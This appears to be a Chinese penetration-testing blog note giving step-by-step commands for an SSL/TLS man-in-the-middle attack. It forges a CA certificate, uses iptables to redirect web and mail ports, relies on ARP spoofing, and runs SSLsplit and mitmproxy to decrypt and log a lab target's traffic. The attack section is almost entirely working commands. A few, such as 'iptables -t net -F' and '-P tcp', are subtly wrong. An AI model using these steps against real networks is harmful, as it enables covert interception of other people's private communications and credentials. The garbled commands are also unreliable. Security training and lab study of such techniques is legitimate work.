【渗透测试笔记】之【SSL/TLS中间人攻击】

SSLsplit

  • 伪装服务器需要证书

利用openssl 生成证书私钥

openssl genrsa -out ca.key 2048

在这里插入图片描述

利用私钥签名生成根证书

openssl req -new -x509 -days 3650 -key ca.key -out ca.crt

依次输入

国家简称(CN)
省
市
公司名
单位名称
全限定域名
Email

在这里插入图片描述

启动路由功能

sysctl -w net.ipv4.ip_forward=1

配置规则

iptables -t net -F  # 清空规则
netstat -pantu  # 将占用80、443端口的程序结束占用
iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-ports 8080
iptables -t nat -A PREROUTING -p tcp --dport 443 -j REDIRECT --to-ports 8080
iptables -t nat -A PREROUTING -p tcp --dport 587 -j REDIRECT --to-ports 8443  # MSA
iptables -t nat -A PREROUTING -p tcp --dport 465 -j REDIRECT --to-ports 8443  # SMTPS
iptables -t nat -A PREROUTING -p tcp --dport 993 -j REDIRECT --to-ports 8443  # IMAPS
iptables -t nat -A PREROUTING -p tcp --dport 995 -j REDIRECT --to-ports 8443  # POP3S
iptables -t nat -L  # 查看配置

ARP 欺骗

在这里插入图片描述

启动SSLsplit

需要建立好/root/Desktop/sslsplit/logdir 目录

mkdir logdir
sslsplit -D -l /root/Desktop/sslsplit/connect.log -j /root/Desktop/sslsplit -S logdir/ -k ca.key -c ca.crt ssl 0.0.0.0 8443 tcp 0.0.0.0 8080

开始中间人攻击
在这里插入图片描述
connect.log是连接信息,logdir是传输的信息
在目标机器上百度123123123

cd logdir
grep 123123123 *

在这里插入图片描述

cat 20200730T093217Z-192.168.2.101,1348-103.235.46.122,80.log

在这里插入图片描述

Mitmproxy

arp欺骗之前的步骤一样,除了配置规则:

iptables -F  # 清空规则
netstat -pantu  # 将占用80、443端口的程序结束占用
iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-ports 8080
iptables -t nat -A PREROUTING -P tcp --dport 443 -j REDIRECT --to-ports 8080

启动

mitmproxy -T --host -w mitmproxy.log
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值